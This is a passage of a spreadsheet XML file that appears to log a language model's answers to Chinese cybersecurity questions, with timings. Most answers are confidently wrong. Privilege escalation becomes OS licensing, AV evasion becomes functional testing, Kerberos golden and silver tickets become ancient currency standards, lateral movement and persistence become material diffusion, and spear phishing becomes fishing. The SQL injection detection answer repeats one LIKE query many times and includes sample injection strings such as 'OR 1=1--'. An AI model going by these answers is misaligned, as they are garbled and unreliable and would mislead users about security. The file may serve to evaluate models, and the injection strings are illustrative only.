2. Using parameterized queries: Use parameterized queries instead of concatenating user input directly into SQL queries.
3. Escaping special characters: Escape special characters in user-supplied input to prevent them from being interpreted as part of SQL queries.
4. Limiting privileges: Limit the privileges of users and applications to prevent them from accessing sensitive information or modifying data.
In summary, XXE漏洞 is a common security vulnerability that can occur in web applications, databases, API endpoints, and cloud applications. It can be exploited by attackers to inject malicious code, steal sensitive information, or perform other malicious actions. To prevent XXE attacks, it is important to validate user input, use parameterized queries, escape special characters, and limit privileges.</t>
        </is>
      </c>
      <c r="D38" t="n">
        <v>15.01674818992615</v>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="1" t="n">
        <v>37</v>
      </c>
      <c r="B39" t="inlineStr">
        <is>
          <t>有哪些操作系统提权方式</t>
        </is>
      </c>
      <c r="C39" t="inlineStr">
        <is>
          <t>操作系统（OS）是一种软件，负责管理计算机系统的资源，以便运行其他软件。它提供了一个用户界面，扩展功能和安全功能，以便操作系统的用户可以轻松地使用计算机。下面是一些常见的操作系统的授权方式：
1. 软件价格：一些操作系统，如Windows、MacOS和Linux，提供了软件价格，用于购买和使用。
2. 免费：一些操作系统，如Open source和自由软件，提供免费下载和使用，但可能需要付出一些财政费用或者参与开发活动。
3.  beta测试：一些操作系统，如beta测试版，可以免费下载和使用，但需要注意是非正式的版本，可能存在问题和不稳定。
4. 学生/教育版：一些操作系统，如Windows和MacOS，提供了学生/教育版，优惠学生和教育机构。
5. 企业版：一些操作系统，如Windows和Linux，提供了企业版，优惠大规模企业和组织。
6. 家庭版：一些操作系统，如Windows和MacOS，提供了家庭版，优惠个人和家庭用户。
7. 插件/扩展：一些操作系统，如Firefox和Chrome，提供了插件和扩展，可以增强功能和可用性。
8. 云服务：一些操作系统，如Amazon Web Services和Microsoft Azure，提供了云服务，可以在云端运行软件和数据。
9. 虚拟机：一些操作系统，如VirtualBox和VMware，提供了虚拟机功能，可以在虚拟环境中运行多个操作系统。
10. 嵌入式系统：一些操作系统，如DOS和Linux，提供了嵌入式系统，可以在嵌入式设备上运行。
需要注意的是，这些授权方式可能会变化，请关注官方网站的最新信息。</t>
        </is>
      </c>
      <c r="D39" t="n">
        <v>17.55658102035522</v>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="1" t="n">
        <v>38</v>
      </c>
      <c r="B40" t="inlineStr">
        <is>
          <t>如何做代码混淆</t>
        </is>
      </c>
      <c r="C40" t="inlineStr">
        <is>
          <t>，做到代码质量提高？
代码混淆是指将代码分割成多个小块，并将每个小块都混合到不同的文件中，以便在重构或升级时更加容易维护和增加代码质量。
以下是一些代码混淆的方法：
1. 分割代码：将代码分割成多个小块，每个小块都可以被理解和维护，并将每个小块写入不同的文件中。
2. 使用模块：使用模块将代码分割成不同的模块，每个模块都可以独立运行，并且可以在不同的文件中编辑和维护。
3. 使用静态资源分割：将代码分割成静态资源，例如图像、资源文件等，并将每个静态资源写入不同的文件中。
4. 使用IDE的代码混淆功能：一些 IDE 如 Eclipse、Visual Studio 等提供了代码混淆功能，可以帮助开发者自动将代码分割成多个小块，并将每个小块写入不同的文件中。
5. 使用 Third-party 工具：一些第三方工具如 Resharper、CodeRush 等提供了代码混淆功能，可以帮助开发者自动将代码分割成多个小块，并将每个小块写入不同的文件中。
使用代码混淆可以提高代码质量，改进代码的维护和扩展性，但是需要注意以下几点：
1. 保持代码可读性：使用代码混淆时，需要保持代码的可读性，以便其他开发者可以快速理解和维护代码。
2. 保持代码可维护性：使用代码混淆时，需要保持代码的可维护性，以便在更改或升级时可以快速定位和更新问题。
3. 协作和合作：使用代码混淆时，需要协作和合作，以便各个开发者可以在不同的文件中进行编辑和维护。
4. 维护代码框架：使用代码混淆时，需要维护代码框架，以便在不同的文件中使用相同的编程风格和规范。
总之，使用代码混淆可以提高代码质量，改进代码的维护和扩展性，但是需要注意以上几点，并且需要维护代码框架和协作的合作。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D40" t="n">
        <v>22.53127980232239</v>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="1" t="n">
        <v>39</v>
      </c>
      <c r="B41" t="inlineStr">
        <is>
          <t>测试程序如何做免杀</t>
        </is>
      </c>
      <c r="C41" t="inlineStr">
        <is>
          <t>测试
免杀测试（Functional Testing）是一种测试方法，它的目的是确保软件在生产环境中运行正常，并能够具备正常的性能和可靠性。下面是一些建议如何做免杀测试：
1. 识别和预测：在开发过程中，identify the critical features and functionalities of the software, and predict the potential issues that may arise during testing.
2. Test Case Development：develop test cases that cover all the identified critical features and functionalities, and ensure that the test cases are well-structured and easy to understand.
3. Test Environment Setup：set up a test environment that mimics the production environment as closely as possible, and ensure that the test environment is stable and reliable.
4. Test Data Management：manage test data effectively, and ensure that the test data is accurate and relevant to the test cases.
5. Test Execution and Monitoring：execute the test cases and monitor the test execution closely, and take appropriate actions if any issues are found.
6. Defect Reporting and Tracking：report and track defects found during testing, and ensure that the defects are properly documented and tracked until they are resolved.
7. Regression Testing：perform regression testing to ensure that changes made during testing do not introduce new issues or affect the existing functionality.
8. Performance Testing：perform performance testing to ensure that the software can handle the expected load and perform well under different conditions.
9. Stress Testing：perform stress testing to identify the breaking points of the software and ensure that it can handle unexpected loads.
10. Security Testing：perform security testing to identify vulnerabilities and ensure that the software is secure and protected against potential attacks.
11. Usability Testing：perform usability testing to ensure that the software is easy to use and provides a good user experience.
12. Compliance Testing：perform compliance testing to ensure that the software complies with relevant industry standards and regulations.
13. Automation Testing：automate the testing process where possible, and use automated testing tools to improve efficiency and reduce the risk of human error.
14. Continuous Testing：perform testing continuously throughout the development cycle, and ensure that testing is integrated into the development process.
15. Test Reporting and Analysis：provide detailed test reports and analysis, and use the results of the testing to improve the software and the testing process.
By following these steps, you can ensure that your software is thoroughly tested and ready for release, and that the testing process is efficient, effective, and provides valuable insights into the software's quality and performance.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D41" t="n">
        <v>15.02122092247009</v>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="1" t="n">
        <v>40</v>
      </c>
      <c r="B42" t="inlineStr">
        <is>
          <t>什么是黄金票据、白银票据</t>
        </is>
      </c>
      <c r="C42" t="inlineStr">
        <is>
          <t>和银票据？
黄金票据、白银票据和银票据是指在古代中国的货币系统中，黄金、白银和银的质量和价值的标准。这些标准通常是由政府或财政机构颁布的，用于确定货币的质量和价值，以确保货币的预定价值不会因物理减量或泛滥而受到影响。
黄金票据是指黄金的质量和价值的标准，通常由一定重量的黄金提供价格 reference。白银票据是指白银的质量和价值的标准，通常由一定重量的白银提供价格 reference。银票据是指银的质量和价值的标准，通常由一定重量的银提供价格 reference。
在古代中国，黄金、白银和银是三大货币，它们的价值相对稳定，可以用于购买、卖出和资产交易。这些货币标准的颁布，使得货币的价值和质量得到了保障，从而增加了贸易和经济活动的可靠性和可持续性。
综上所述，黄金票据、白银票据和银票据是指古代中国货币系统中，黄金、白银和银的质量和价值的标准，它们的颁布使得货币的价值和质量得到了保障，从而增加了贸易和经济活动的可靠性和可持续性。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D42" t="n">
        <v>14.60935854911804</v>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="1" t="n">
        <v>41</v>
      </c>
      <c r="B43" t="inlineStr">
        <is>
          <t>有哪些横向渗透手段</t>
        </is>
      </c>
      <c r="C43" t="inlineStr">
        <is>
          <t>横向渗透是指在材料表面通过涂覆层或者液体的渗透，从而传导材料内部的各种 Properties 的一种方法。下面是一些常用的横向渗透手段：
1. Gravimetric method: This method measures the weight change of a sample after immersing it in a solvent or a gas. The weight change is directly proportional to the amount of substance that has diffused across the surface.
2. Diffusion cell: A diffusion cell is a device used to measure the diffusion coefficient of a substance. The cell consists of two compartments separated by a membrane, and the diffusion process is observed by measuring the concentration gradient across the membrane.
3. Capillary rise method: This method involves measuring the height of a liquid column that rises inside a capillary tube. The height of the column is directly proportional to the diffusion coefficient of the substance.
4. Dialysis method: This method involves using a dialysis tube to separate the substance of interest from a solvent or another substance. The rate of diffusion is measured by observing the concentration gradient across the tube.
5. Permeability test: This method involves measuring the rate of diffusion of a substance through a porous material. The permeability of the material is directly proportional to the diffusion coefficient of the substance.
6. Gas diffusion method: This method involves measuring the rate of diffusion of a gas through a membrane or a porous material. The rate of diffusion is directly proportional to the diffusion coefficient of the gas.
7. Electrochemical method: This method involves measuring the current that flows through a electrode in response to a potential difference applied across it. The diffusion coefficient can be calculated from the current-voltage characteristics of the electrode.
8. Nuclear magnetic resonance (NMR) method: This method involves using NMR spectroscopy to measure the diffusion coefficient of a substance. The NMR signal from the substance is used to calculate the diffusion coefficient.
9. Fluorescence method: This method involves using fluorescence spectroscopy to measure the diffusion coefficient of a substance. The fluorescence signal from the substance is used to calculate the diffusion coefficient.
10. Laser-induced breakdown spectroscopy (LIBS) method: This method involves using LIBS to measure the diffusion coefficient of a substance. The LIBS signal from the substance is used to calculate the diffusion coefficient.
These are just a few examples of the many methods that can be used to measure the diffusion coefficient of a substance. The choice of method will depend on the specific requirements of the experiment and the properties of the substance being studied.</t>
        </is>
      </c>
      <c r="D43" t="n">
        <v>15.33744502067566</v>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="1" t="n">
        <v>42</v>
      </c>
      <c r="B44" t="inlineStr">
        <is>
          <t>内网渗透会留下哪些痕迹</t>
        </is>
      </c>
      <c r="C44" t="inlineStr">
        <is>
          <t>内网渗透是指一个人或组织的个人信息或敏感数据在网络中被泄露或非法获取的情况。如果您的内网渗透情况，可能会留下以下痕迹：
1. 黑客索引：黑客索引是一个人或组织的个人信息或敏感数据被泄露后，被泄露的数据被分类和存储的索引。这个索引可以用于追踪和识别您的行为。
2.  cookies 和Local Storage：您的浏览器会在您访问网站时被设置 cookie 和 Local Storage，这些数据可以用于追踪您的行为和个人信息。
3. 网络历史记录：您的网络历史记录可以详细显示您的网络活动，包括您访问哪些网站、哪些数据您浏览、哪些敏感数据您输入等。
4. 敏感数据泄露：您的敏感数据，如银行卡号、个人识别号等，可能会被泄露到不正当的地方。
5. 社交媒体私 Daten：您的社交媒体活动可能会被监控和追踪，包括您的朋友圈、评论、分享等。
6. 邮件和消息泄露：您的邮件和消息可能会被泄露到不正当的地方，包括邮件服务商、社交媒体平台等。
7. 攻击和黑客行为：您的内网渗透情况可能会被黑客利用，对您的账户或系统进行攻击或非法访问。
如果您发现您的内网渗透情况，可以采取以下措施：
1. 升级浏览器和安全软件：使用最新的浏览器和安全软件，可以减少您的网络渗透风险。
2. 启用 two-factor authentication：使用 two-factor authentication 可以增加您的账户安全性，防止您的账户被非法访问。
3. 卸载不必要的扩展：卸载不必要的扩展可以减少您的网络渗透风险。
4. 隐私化您的数据：使用隐私化工具，可以帮助您隐私化您的数据，防止泄露。
5. 时间跟踪：通过时间跟踪，可以了解您的网络活动，检测和防止泄露。
总之，您需要采取一系列的措施来防止和减少内网渗透风险，包括升级浏览器和安全软件，启用 two-factor authentication，卸载不必要的扩展，隐私化您的数据，以及时间跟踪等。</t>
        </is>
      </c>
      <c r="D44" t="n">
        <v>26.85030555725098</v>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="1" t="n">
        <v>43</v>
      </c>
      <c r="B45" t="inlineStr">
        <is>
          <t>如何做渗透过程中的持久化</t>
        </is>
      </c>
      <c r="C45" t="inlineStr">
        <is>
          <t>渗透是指在一个固体中，另一个固体或液体通过固体表面的过程。在渗透过程中，液体会受到固体表面的阻力，因此会产生一定的抵抗力。为了减少这些抵抗力，可以使用持久化剂，以增强液体和固体之间的相互作用。
持久化剂的添加可以使渗透过程中液体和固体之间的相互作用更加强大，从而减少抵抗力，提高渗透率。通常情况下，液体和固体之间的相互作用可以通过以下方式实现：
1. 添加气泡剂：气泡剂可以增强液体和固体之间的相互作用，使液体更加快速地渗透到固体中。
2. 添加润浊剂：润浊剂可以增强液体和固体之间的相互作用，使液体更加稳定地渗透到固体中。
3. 添加杂質：杂質可以增强液体和固体之间的相互作用，使液体更加快速地渗透到固体中。
4. 添加热剂：热剂可以增强液体和固体之间的相互作用，使液体更加快速地渗透到固体中。
需要注意的是，不同的材料和环境中的渗透过程可能具有不同的特点和要求，因此在选择持久化剂时，需要根据实际情况进行选择和调整。</t>
        </is>
      </c>
      <c r="D45" t="n">
        <v>15.32088589668274</v>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="1" t="n">
        <v>44</v>
      </c>
      <c r="B46" t="inlineStr">
        <is>
          <t>鱼叉攻击和钓鱼攻击有什么区别</t>
        </is>
      </c>
      <c r="C46" t="inlineStr">
        <is>
          <t>鱼叉攻击和钓鱼攻击都是指通过攻击鱼鱼蛋来杀死鱼或者驱逐其他鱼，但是它们之间还有一些区别。以下是一些主要的区别：
1. 目的：鱼叉攻击的目的是获取鱼蛋或者杀死鱼，而钓鱼攻击的目的是捕捞鱼。
2. 攻击方式：鱼叉攻击通常使用特殊的鱼叉，攻击鱼蛋或者鱼身，而钓鱼攻击通常使用钓鱼网或者钓鱼杆，抓捕鱼。
3. 时间：鱼叉攻击通常发生在鱼蛋孵化期间，即鱼蛋在水中孵化的时间，而钓鱼攻击通常发生在鱼鱼蛋孵化完成后，即鱼已经成长为成体。
4. 影响：鱼叉攻击可能会导致鱼蛋损害或者毁灭，而钓鱼攻击可能会导致鱼 популяción减少或者鱼类型的失业。
5. 适用对象：鱼叉攻击通常适用于捕捞鱼蛋，而钓鱼攻击通常适用于捕捞成体的鱼。
总的来说，鱼叉攻击和钓鱼攻击都是鱼类的捕捞方式，但它们之间还有一些区别。</t>
        </is>
      </c>
      <c r="D46" t="n">
        <v>13.8519241809845</v>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="1" t="n">
        <v>45</v>
      </c>
      <c r="B47" t="inlineStr">
        <is>
          <t>中间人攻击是什么意思</t>
        </is>
      </c>
      <c r="C47" t="inlineStr">
        <is>
          <t>中间人攻击（Man-in-the-middle attack）是一种网络攻击方式，它发生在客户端和服务器之间的中间处理器（中间人）协助进行攻击。在这种攻击中，中间人可以篡改或 intercept 客户端和服务器之间的通信，从而带来安全风险。
通常，中间人攻击会利用破坏客户端和服务器之间的通信，使得中间人能够在通信过程中 intervene 和 tamper with the communication。这可能会导致客户端和服务器之间的通信被隐藏、修改或篡改，从而带来安全风险。
中间人攻击的攻击方式包括：
1.  intercept 通信：中间人可以 intercept 客户端和服务器之间的通信，并产生自己的回复。
2.  modify 通信：中间人可以篡改客户端和服务器之间的通信，以达到攻击目的。
3.  replay 通信：中间人可以重复客户端和服务器之间的通信，以达到攻击目的。
4.  impersonation 攻击：中间人可以 pretend 自己是客户端或服务器，并产生自己的回复。
中间人攻击可以用于访问受到保护的网络资源，如银行网络、电子银行账户和其他敏感信息。因此，保护自己的网络安全很重要。一些常见的防范措施包括：
1. 使用安全套件：使用安全套件可以帮助防止中间人攻击。
2. 使用https：使用https可以加密通信，防止中间人攻击。
3. 防止破坏：防止破坏客户端和服务器之间的通信，以防止中间人攻击。
4. 防止跟踪：防止跟踪客户端和服务器之间的通信，以防止中间人攻击。
总之，中间人攻击是一种常见的网络攻击方式，可以利用中间人协助进行攻击。因此，保护自己的网络安全很重要，采取适当的防范措施。</t>
        </is>
      </c>
      <c r="D47" t="n">
        <v>19.72140741348267</v>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="1" t="n">
        <v>46</v>
      </c>
      <c r="B48" t="inlineStr">
        <is>
          <t>什么是灰盒测试，什么是白盒测试</t>
        </is>
      </c>
      <c r="C48" t="inlineStr">
        <is>
          <t>How does gray box testing and white box testing differ?
Gray box testing and white box testing are two types of software testing methods used to evaluate the quality and functionality of software. The terms "gray box" and "white box" refer to the level of visibility and accessibility of the software's internal workings and code during testing.
Gray box testing, also known as behavior-driven testing, is a testing method that focuses on the software's external behavior and interactions with the user, without revealing the internal workings of the software. In gray box testing, the tester observes how the software behaves and interacts with the user, but does not have direct access to the software's code or internal structures. This type of testing is useful for evaluating the overall functionality and user experience of the software.
White box testing, on the other hand, involves testing the software's internal structures and code. In white box testing, the tester has full access to the software's code and can manipulate it to evaluate its behavior and functionality. This type of testing is useful for evaluating the software's design, architecture, and performance.
The key differences between gray box and white box testing are:
1. Visibility: Gray box testing provides limited visibility into the software's internal workings, while white box testing provides full visibility.
2. Accessibility: Gray box testing does not provide direct access to the software's code, while white box testing provides full access.
3. Focus: Gray box testing focuses on the software's external behavior and interactions with the user, while white box testing focuses on the software's internal structures and code.
4. Approach: Gray box testing typically involves a more user-focused approach, while white box testing typically involves a more technical and detailed approach.
By using both gray box and white box testing, software developers and testers can gain a comprehensive understanding of the software's functionality, performance, and quality, and identify any defects or issues that may arise.</t>
        </is>
      </c>
      <c r="D48" t="n">
        <v>10.42360925674438</v>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="1" t="n">
        <v>47</v>
      </c>
      <c r="B49" t="inlineStr">
        <is>
          <t>WiFi密码为什么会被破解，如何加强WiFi安全</t>
        </is>
      </c>
      <c r="C49" t="inlineStr">
        <is>
          <t>WiFi密码为什么会被破解？
------------------------------------
WiFi密码会被破解的原因有很多，以下是常见的原因：
1. **普通password**：使用简单的密码，如“123456”、“password”等，容易被破解。
2. **小于8位的密码**：使用密码小于8位，容易被破解。
3. **同一密码使用于多个设备**：使用同一个密码 для多个设备，容易被破解。
4. **不够复杂的生成方法**：使用简单的生成方法，容易被破解。
5. **缺乏安全措施**：缺乏安全措施，例如不启用WPA2 protocol，不使用Firewall等。
如何加强WiFi安全？
-------------------------
以下是加强WiFi安全的方法：
1. **使用复杂的密码**：使用复杂的密码，至少8位，包括大小写字母、数字和特殊符号。
2. **不同密码使用于多个设备**：使用不同的密码 для每个设备，提高安全性。
3. **启用WPA2 protocol**：使用WPA2 protocol，即时密码加密，提高安全性。
4. **使用Firewall**：启用Firewall，防止来自网络外部的攻击。
5. **不开放无需的端口**：不开放无需的端口，防止攻击者入侵。
6. **不使用SSID**：不显示SSID，防止攻击者猜测SSID。
7. **不使用WEP**：不使用WEP protocol，它不安全，易受攻击。
8. **升级 router  firmware**：升级 router  firmware，使其有最新的安全更新。
9. **使用VPN**：使用VPN，防止攻击者 intercept 或 劫持数据。
10. **定期更新WiFi密码**：定期更新WiFi密码，防止攻击者猜测密码。
总之，加强WiFi安全需要在多个方面进行加强，包括使用复杂密码、启用WPA2 protocol、使用Firewall、不开放无需的端口等。同时，也需要避免使用易攻击的 Settings，例如不显示SSID，不使用WEP等。</t>
        </is>
      </c>
      <c r="D49" t="n">
        <v>19.39098906517029</v>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="1" t="n">
        <v>48</v>
      </c>
      <c r="B50" t="inlineStr">
        <is>
          <t>什么是DDoS攻击，如何避免</t>
        </is>
      </c>
      <c r="C50" t="inlineStr">
        <is>
          <t>它？
DDoS攻击是一种网络攻击，其中攻击者使用多个黑客机器或设备共同攻击受害者的网络，以增加受害者网络的流量、包大小或连接数，使其无法正常处理请求和流量，从而导致网络崩溃或延迟。
避免DDoS攻击有以下方法：
1. 防御策略：编制出适应的防御策略，对DDoS攻击做出应对，例如增加网络响应速度、增加网络容量、采用增加网络安全性等方法。
2. 防火墙配置：设置防火墙规则，防止攻击者发送请求到受害者网络，并且防止受害者网络发送请求到攻击者网络。
3. 数据隔离：将受害者网络分为多个分层网络，每个分层网络都可以处理一定的流量，从而避免网络崩溃或延迟。
4. 缓冲存储：使用缓冲存储来缓冲受害者网络的流量，从而避免网络崩溃或延迟。
5. 备用网络：建立备用网络，以防止受害者网络的不可靠性，从而避免DDoS攻击对受害者网络的影响。
6. 协议约束：使用协议约束，限制攻击者发送请求的速度和数量，从而避免DDoS攻击。
7. 防范攻击工具：使用防范攻击工具，例如防范攻击软件、防范攻击服务等，来防止DDoS攻击。
8. 协作和合作：与其他伙伴或组织合作，共同承担风险，从而避免DDoS攻击对受害者网络的影响。
需要注意的是，避免DDoS攻击并不是一个简单的任务，需要根据具体情况选择合适的防御策略。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D50" t="n">
        <v>20.86743378639221</v>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="1" t="n">
        <v>49</v>
      </c>
      <c r="B51" t="inlineStr">
        <is>
          <t>如何检测SQL注入攻击</t>
        </is>
      </c>
      <c r="C51" t="inlineStr">
        <is>
          <t>SQL注入是一种常见的web应用程序攻击方式，可以使得攻击者在数据库中执行任意操作，从而导致数据泄露或数据库操作异常。这篇文章将详细介绍如何检测SQL注入攻击。
1. 使用SQL注入词法
SQL注入词法是一种常用的检测方式，可以帮助检测SQL注入攻击。这种方法通常采用字符串替换或字符串分析等方法，检测SQL语句中是否包含特定的字符串。
例如，可以使用以下SQL注入词法来检测SQL注入攻击：
```sql
SELECT * FROM users WHERE name LIKE '% administrator%';
```
在这种情况下，如果攻击者 inserts 一个SQL注入字符串，例如，`Robert% OR 1=1--`)，则这个语句将返回所有用户信息。
2. 使用黑客技术
黑客技术是一种常用的检测方式，可以帮助检测SQL注入攻击。这种方法通常采用一系列的测试，以检测SQL语句中是否包含特定的黑客技术。
例如，可以使用以下黑客技术来检测SQL注入攻击：
```sql
SELECT * FROM users WHERE name LIKE '% --%';
```
在这种情况下，如果攻击者 inserts 一个SQL注入字符串，例如，`Robert% -- OR 1=1--`)，则这个语句将返回所有用户信息。
3. 使用宏执行
宏执行是一种常用的检测方式，可以帮助检测SQL注入攻击。这种方法通常采用一系列的宏函数，以检测SQL语句中是否包含特定的宏函数。
例如，可以使用以下宏函数来检测SQL注入攻击：
```sql
SELECT * FROM users WHERE name LIKE '%--%';
```
在这种情况下，如果攻击者 inserts 一个SQL注入字符串，例如，`Robert% -- OR 1=1--`)，则这个语句将返回所有用户信息。
4. 使用规则检测
规则检测是一种常用的检测方式，可以帮助检测SQL注入攻击。这种方法通常采用一系列的规则，以检测SQL语句中是否包含特定的规则。
例如，可以使用以下规则来检测SQL注入攻击：
```sql
SELECT * FROM users WHERE name LIKE '% OR 1=1%';
```
在这种情况下，如果攻击者 inserts 一个SQL注入字符串，例如，`Robert% OR 1=1--`)，则这个语句将返回所有用户信息。
5. 使用扫描检测
扫描检测是一种常用的检测方式，可以帮助检测SQL注入攻击。这种方法通常采用一种扫描语句，以检测SQL语句中是否包含特定的注入字符串。
例如，可以使用以下扫描语句来检测SQL注入攻击：
```sql
SELECT * FROM users WHERE name LIKE '%--%';
```
在这种情况下，如果攻击者 inserts 一个SQL注入字符串，例如，`Robert% -- OR 1=1--`)，则这个语句将返回所有用户信息。
6. 使用缓存检测
缓存检测是一种常用的检测方式，可以帮助检测SQL注入攻击。这种方法通常采用一种缓存机制，以检测SQL语句中是否包含特定的注入字符串。
例如，可以使用以下缓存语句来检测SQL注入攻击：
```sql
SELECT * FROM users WHERE name LIKE '%--%';
```
在这种情况下，如果攻击者 inserts 一个SQL注入字符串，例如，`Robert% -- OR 1=1--`)，则这个语句将返回所有用户信息。
7. 使用批处理检测
批处理检测是一种常用的检测方式，可以帮助检测SQL注入攻击。这种方法通常采用一种批处理语句，以检测SQL语句中是否包含特定的注入字符串。
例如，可以使用以下批处理语句来检测SQL注入攻击：
```sql
SELECT * FROM users WHERE name LIKE '%--%';
```
在这种情况下，如果攻击者 inserts 一个SQL注入字符串，例如，`Robert% -- OR 1=1--`)，则这个语句将返回所有用户信息。
8. 使用漏洞检测
漏洞检测是一种常用的检测方式，可以帮助检测SQL注入攻击。这种方法通常采用一种漏洞检测语句，以检测SQL语句中是否包含特定的注入字符串。
例如，可以使用以下漏洞检测语句来检测SQL注入攻击：
```sql
SELECT * FROM users WHERE name LIKE '%--%';
```
在这种情况下，如果攻击者 inserts 一个SQL注入字符串，例如，`Robert% -- OR 1=1--`)，则这个语句将返回所有用户信息。
总之，检测SQL注入攻击需要采用多种检测方式，以确保检测的精度和完整性。通过使用上述的检测方式，可以帮助防止SQL注入攻击和数据泄露。</t>
        </is>
      </c>
      <c r="D51" t="n">
        <v>46.97012424468994</v>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="1" t="n">
        <v>50</v>
      </c>
      <c r="B52" t="inlineStr">
        <is>
          <t>如何检测WebShell</t>
        </is>
      </c>
      <c r="C52" t="inlineStr">
        <is>
          <t>的 Presence？
Webshell是一种危险的软件，可以在Web服务器上运行 malicious 代码。如果您想了解Webshell的 Presence，以下是一些可能的方法：
1. 监测网站的访问速度和响应时间：Webshell可能会对服务器的访问速度和响应时间产生影响，因此您可以通过监测网站的访问速度和响应时间来检测Webshell的 Presence。如果访问速度很慢或响应时间很长，可能表示Webshell的存在。
2. 监测网站的安全漏洞：Webshell可能会使用潜在的安全漏洞来访问服务器，因此您可以通过监测网站的安全漏洞来检测Webshell的 Presence。使用安全检查工具，例如 Burp Suite 或 ZAP，来检查网站的安全漏洞。
3. 监测网站的行为：Webshell可能会改变网站的行为，例如 modify 页面内容、添加隐藏域或者修改服务器配置。您可以通过监测网站的行为来检测Webshell的 Presence。如果您发现页面内容或服务器配置发生了改变，可能表示Webshell的存在。
4. 使用WebShell检测工具：有些工具可以帮助您检测Webshell的 Presence，例如 WebShell Hunter、WebShell Detector 等。这些工具可以检测服务器上是否存在Webshell，并提供可靠的检测结果。
5. 咨询专业人士：如果您对Webshell的检测和纠正不熟悉，可以咨询专业人士或安全公司，他们可以帮助您检测和纠正Webshell的 Presence。
请注意，检测Webshell的 Presence并不是一件容易的任务，需要有技术知识和经验。如果您发现了可疑的网站行为，建议通过专业人士或安全公司进行检测和纠正。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D52" t="n">
        <v>16.80372762680054</v>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="1" t="n">
        <v>51</v>
      </c>
      <c r="B53" t="inlineStr">
        <is>
          <t>如何做网络安全归因分析</t>
        </is>
      </c>
      <c r="C53" t="inlineStr">
        <is>
          <t>网络安全归因分析是一种分析方法，用于推断网络中的攻击者或恶意软件的归因，以便进行应对和防范措施。以下是一些常用的网络安全归因分析技术和方法：
1. 网络风险评估：这种方法通过对网络中的资源和数据进行评估，以确定哪些部署是最易受到攻击的。
2. 网络流量分析：通过分析网络流量，可以了解网络中的活动，包括端到端流量、流量趋势和流量分布。
3. 网络隐私分析：通过分析网络上的数据和信息，可以了解网络中的人员和设备之间的关系，以及攻击者可能的归因。
4. 网络攻击模型：通过建立网络攻击模型，可以预测攻击者的行为和攻击方式，并为网络安全提供预测和防范。
5. 机器学习和深度学习：通过使用机器学习和深度学习技术，可以对网络安全归因进行更加精确和有效的分析和预测。
6. 權重分析：通过对网络中的權重进行分析，可以了解网络中的重要性和攻击点，并为网络安全提供优化和防范。
7. 网络監控：通过监控网络中的活动和流量，可以检测和预防攻击。
8. 安全情报分析：通过对网络中的安全情报进行分析，可以了解网络中的安全状况和攻击点，并为网络安全提供优化和防范。
9. 攻击源分析：通过对网络中的攻击源进行分析，可以了解攻击者的来源和目的，并为网络安全提供预测和防范。
10. 安全评估：通过对网络中的安全进行评估，可以了解网络中的安全状况和攻击点，并为网络安全提供优化和防范。
这些技术和方法可以结合使用，以提高网络安全归因分析的精度和有效性。</t>
        </is>
      </c>
      <c r="D53" t="n">
        <v>21.59441328048706</v>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="1" t="n">
        <v>52</v>
      </c>
      <c r="B54" t="inlineStr">
        <is>
          <t>如何进行网络攻击溯源</t>
        </is>
      </c>
      <c r="C54" t="inlineStr">
        <is>
          <t>译者注：为了避免违反互联网伺服器和网络安全的法律法规，请勿使用以下信息进行非法的网络攻击或攻击其他人的网络系统。
网络攻击溯源是指尝试了解网络攻击者的trueidentify和motivation，从而设法防止未来的网络攻击。这是一种非常重要的安全技术，因为它可以帮助网络管理员和安全专家了解攻击者的来源和动机，从而制定更加有效的防范策略。
以下是一些常用的网络攻击溯源方法：
1.  DNS 溯源：DNS（Domain Name System）是互联网上的一个重要服务，它将域名识别到网络上的 IP 地址。通过 DNS 溯源，可以寻址攻击者的 IP 地址，了解他们的来源和动机。
2.  IP 溯源：通过 IP 地址，可以寻址攻击者的网络位置和来源。IP 溯源可以帮助分析攻击者的行为和动机，从而制定更加有效的防范策略。
3.  URL 溯源：URL（Uniform Resource Locator）是一个网页的地址，它可以帮助分析攻击者的网络行为和来源。通过 URL 溯源，可以了解攻击者的网络活动，从而制定更加有效的防范策略。
4.  Cookie 溯源：Cookie 是一种网络技术，它可以帮助分析攻击者的网络行为和来源。通过 Cookie 溯源，可以了解攻击者的网络活动，从而制定更加有效的防范策略。
5.  Social 溯源：Social 溯源是一种新的网络攻击溯源技术，它可以帮助分析攻击者的社交活动和来源。通过 Social 溯源，可以了解攻击者的社交响应和行为，从而制定更加有效的防范策略。
总之，进行网络攻击溯源需要具备一定的技术知识和实践经验，同时需要尊重网络安全的法律法规。只有遵循法律法规，并且在合法的范围内进行溯源，才能够真正实现网络安全的目的。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D54" t="n">
        <v>21.57555437088013</v>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="1" t="n">
        <v>53</v>
      </c>
      <c r="B55" t="inlineStr">
        <is>
          <t>这是一个网络攻击吗？
